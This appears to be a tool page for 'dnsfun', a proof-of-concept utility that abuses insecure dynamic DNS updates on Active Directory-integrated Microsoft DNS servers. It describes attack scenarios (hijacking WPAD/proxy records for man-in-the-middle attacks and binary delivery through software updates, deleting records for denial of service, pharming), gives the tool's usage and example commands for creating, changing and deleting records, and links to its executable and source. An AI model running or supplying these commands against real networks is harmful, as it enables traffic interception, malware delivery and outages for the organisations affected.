By default, most Microsoft DNS servers integrated with active directory allows insecure dynamic updates
for dns records.
This feature allows remote users to create, change and delete DNS records by calling apis like DnsReplaceRecordSetA
Dnsfun exploits that weak configuration and allows remote users to modify dns records.
There are several attack scenarios:
+ MITM attacks: Changing dns records for the network proxy/WPAD and relay HTTP queries. This attack vector is the most reliable and also allows us to exploit automatic updates for most Windows software, by deploying custom binaries to the client.
+ Denial of service: by deleting / changing critical dns records
+ Pharming: like mitm attacks, poisoning several dns records.
If the system is configured right, only the owner of that record is able to modify the dns entry but that doesn´t prevent authenticated users to create new dns records.
Microsoft Dynamic DNS Updates - Proof of Concept v1.1
http://www.tarasco.org- (c) 2007-2008 Andres Tarasco Acuña
dnsfun.exe -[s]d|c|q[u][x|y|z] [options]
dnsfun.exe -s ip (dns Server (optional))
dnsfun.exe -d fqdn (Delete dns record)
dnsfun.exe -q fqdn (Query dns record)
dnsfun.exe -c[a|c] ip (Create A or CName record (default A))
dnsfun.exe -x user (auth information. also use -y and -z)
dnsfun.exe -y pass (auth information. also use -x and -z)
dnsfun.exe -z domain (auth information. also use -x and -y)
dnsfun.exe -u ip|fqdn (Update dns record (requires -q or -c))
dnsfun.exe -s 10.0.0.1 -q proxy.mydomain.com -u 18.104.22.168 (Updates record)
dnsfun.exe -s 10.0.0.1 -d foo.mydomain.com (delete foo.mydomain.com record)
dnsfun.exe -s 10.0.0.1 -c atarasco.foo.mydomain.com -u 22.214.171.124 (creates record)
dnsfun.exe -s 10.0.0.1 -cc www.atarasco.foo.mydomain.com -u 126.96.36.199 (creates record)
dnsfun.exe -s 10.0.0.1 -q _ldap._tcp.mydomain (Query for srv record)
You can also browse online the source code
(Windows executable + Source code)